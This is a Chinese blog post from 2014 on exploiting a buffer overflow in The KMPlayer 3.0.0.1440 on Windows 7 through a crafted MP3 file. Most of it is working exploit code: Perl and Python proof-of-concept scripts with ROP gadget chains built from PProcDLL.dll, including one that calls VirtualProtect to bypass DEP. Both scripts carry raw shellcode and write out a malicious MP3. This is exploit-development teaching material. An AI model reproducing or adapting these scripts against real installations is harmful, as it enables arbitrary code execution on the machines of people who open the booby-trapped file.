zcc1414

博客园 首页 联系 订阅 管理
默认win7+开启DEP win7 VirtualProtect 3方法 The KMPlayer 3.0.0.1440 WIN7 ASLR+DEP

默认情况下  WIN7 安装这个软件  对这个软件exe   DEP是没开启的 如果这是这样的话,可能有点难度,如果能再给一个没有开启DEP的DLL那么就更好了

~_~    更好破的说~_~  

软件是一个音乐播放器,运行后  加载一个  MP3  才会加载漏洞DLL,并且 音乐播放完毕后,DLL没有卸载出 没有使用 FreeLibrary,

所以有EXE+DLL 两个没有 开启DEP 的地址让我们去利用


http://www.exploit-db.com/exploits/17383/


如果默认情况下~~~~~~~~~~~~~~~~WIN7  OPTIN下 这个软件没开启DEP

简便方法:Perl POC 如下:

my $file = "1.mp3";#perl    
my $just= "A"x16;

$just = $just.pack('V',0x100FCB7F);# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x60;

$just = $just.pack('V',0x100D7C2A);# PUSH EDI # PUSH 5F6C7789 # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN 18 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x24;

$just = $just.pack('V',0x100346E8);# ADD EBP,0A4 # MOV ESP,EBP # POP EBP # RETN 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x24; #top 0x18

$just = $just."\x90"x56;
$just = $just.pack('V',0x10101BB8);# PUSH ESP # RETN 	[Module : PProcDLL.dll]  **

my $shellcode = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x5B\x0C\x8B\x5B\x0C\x8B\x1B\x8B\x1B\x8B\x5B\x18\x8B\xEB\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

my $payload= $just.$shellcode;

print length($payload);  
open($FILE,">$file");      
binmode($FILE);
print $FILE $payload;      
close($FILE);



VirtualProtect 3方法 

这种情况就是对方的电脑开启了DEP optout

bcdedit /set nx alwayson


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

注意用 python 写 文件生成时  用 不然会生成错误\x0a\x0b

import os
 
evilfile = "1.mp3"

~~~~~~

crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()


perl 写文件时 用   不然会生成错误\x0a\x0b

my $file = "exploits.m3u";#perl    
  
my $junk= "\x41"x26075;  
 
my $payload= $junk;

print length($payload);  
open($FILE,">$file");      
binmode($FILE);
print $FILE $payload;      
close($FILE);     

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


python POC:  

import os
 
evilfile = "1.mp3"
 
junk = "A"*16

shellcode = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x5B\x0C\x8B\x5B\x0C\x8B\x1B\x8B\x1B\x8B\x5B\x18\x8B\xEB\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"

rop_align = "BBBB"
 
################################# Begin ROP chain #################################
 
########## Redirect execution back to stack ##########
rop = "\x17\xBF\x0E\x10"                        #0x100EBF17 :  # ADD ESP,20 # RETN 4
rop += rop_align * 9
########## Place stack pointer in EAX ##########
rop += "\x7F\xCB\x0F\x10"                       #0x100FCB7F :  # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
rop += rop_align    * 15
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
########## Jump over VirtualProtect() params ##########
rop += "\x56\x75\x13\x10"                       #0x10137556 :  # ADD ESP,20 # RETN
########## VirtualProtect call placeholder ##########
rop += "\x42\x45\x45\x46"                       #&Kernel32.VirtualProtect() placeholder - "BEEF"
rop += "WWWW"                                   #Return address param placeholder
rop += "XXXX"                                   #lpAddress param placeholder
rop += "YYYY"                                   #Size param placeholder
rop += "ZZZZ"                                   #flNewProtect param placeholder
rop += "\x60\xFC\x18\x10"                       #lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
rop += rop_align    * 2
########## Grab kernel32 pointer from the stack, place it in EAX ##########

rop += "\x5D\x1C\x12\x10" * 6                   #0x10121C5D :  # SUB EAX,30 # RETN

rop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" *4                       #0x100E2933 :  # DEC EAX # RETN

rop += "\xF6\xBC\x11\x10"                       #0x1011BCF6 :  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN 
rop += rop_align
########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
rop += "\xA6\x42\x01\x10" 			            #0x100142A6 :  # POP ESI # RETN 	    [Module : PProcDLL.dll]  ** 
rop += "\x45\x5e\xff\xff"                       #0xFFFFF667 = 0-0xA1BB 
rop += "\xBE\x40\x01\x10"                       #0x100140BE :  # ADD EAX,ESI # RETN 	[Module : PProcDLL.dll]  ** 
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## At this point, ECX = &kernel32.VirtualProtect
 
########## Make EAX point to address of VirtualProtect() placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\x9f\x2b\x0d\x10" * 4                   #0x100D2B9F :  # SUB EAX,1 # RETN 	[Module : PProcDLL.dll]  ** 
########## Write VirtualProtect pointer to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make ECX point to address of nops / shellcode ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align * 2 
rop += ("\x76\xE5\x12\x10" + rop_align) * 3     #0x1012E576 :  # ADD EAX,100 # POP EBP # RETN
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## Make EAX point to return address placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
########## Write return address to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make EAX point to lpAddress placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 7                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\xD5\xCE\x11\x10" * 4                   #0x1011CED5 :  # INC EAX # RETN
########## Write lpAddress to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
rop += "\x77\x78\x12\x10"                       #0x10127877 :  # SUB EAX,7 # POP ESI # RETN
rop += rop_align * 2
rop += "\x33\x29\x0E\x10"                       #0x100E2933 :  # DEC EAX # RETN
rop += "\x81\x96\x03\x10"                       #0x10039681 :  # XCHG EAX,EBX # ADD AL,10 # RETN    [Module : PProcDLL.dll]  ** 
########## Make EAX point to Size param placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
rop += "\x2C\x2A\x0D\x10"                       #0x100D2A2C :  # XOR EAX,EAX # RETN
rop += ("\x76\xE5\x12\x10" + rop_align) * 10    #0x1012E576 :  # ADD EAX,100 # POP EBP # RETN
########## Write Size param to stack ##########
rop += "\x60\x83\x02\x10"                       #0x10028360 :  # MOV DWORD PTR DS:[ECX],EAX # RETN
########## Make EAX point to address of flNewProtect placeholder ##########
rop += "\xD2\x9F\x10\x10"                       #0x10109FD2 :  # MOV EAX,ECX # RETN
rop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" * 4                   #0x100E2933 :  # DEC EAX # RETN
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## Put flNewProtect param (0x00000040) in EAX ##########
rop += "\x2C\x2A\x0D\x10"                       #0x100D2A2C :  # XOR EAX,EAX # RETN
rop += "\x68\xE5\x12\x10"                       #0x1012E568 :  # ADD EAX,40 # POP EBP # RETN
rop += rop_align
########## Write flNewProtect param to stack ##########
rop += "\x60\x83\x02\x10"                       #0x10028360 :  # MOV DWORD PTR DS:[ECX],EAX # RETN
 
########## Everything is ready to go, Get EBX back into ESP and RETN ##########
rop += "\xD8\xA3\x10\x10"                       #0x10039681 :  # XCHG EAX,EBX # ADD AL,10 # RETN
rop += rop_align
rop += "\x99\x09\x11\x10"                       #0x10110999 :  # XCHG EAX,ESP # RETN
################################# End ROP chain #################################
 
nops = "\x90" * 300

sploit = (junk + rop + nops + shellcode )
 
crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()


话说 我还不小心把  VirtualProtect 整成了 VirtualAlloc 妈蛋  闹了个乌龙~~~~~~~~~~~~~~~~















posted on 2014-07-15 18:31  zcc1414  阅读(558)  评论(0编辑  收藏  举报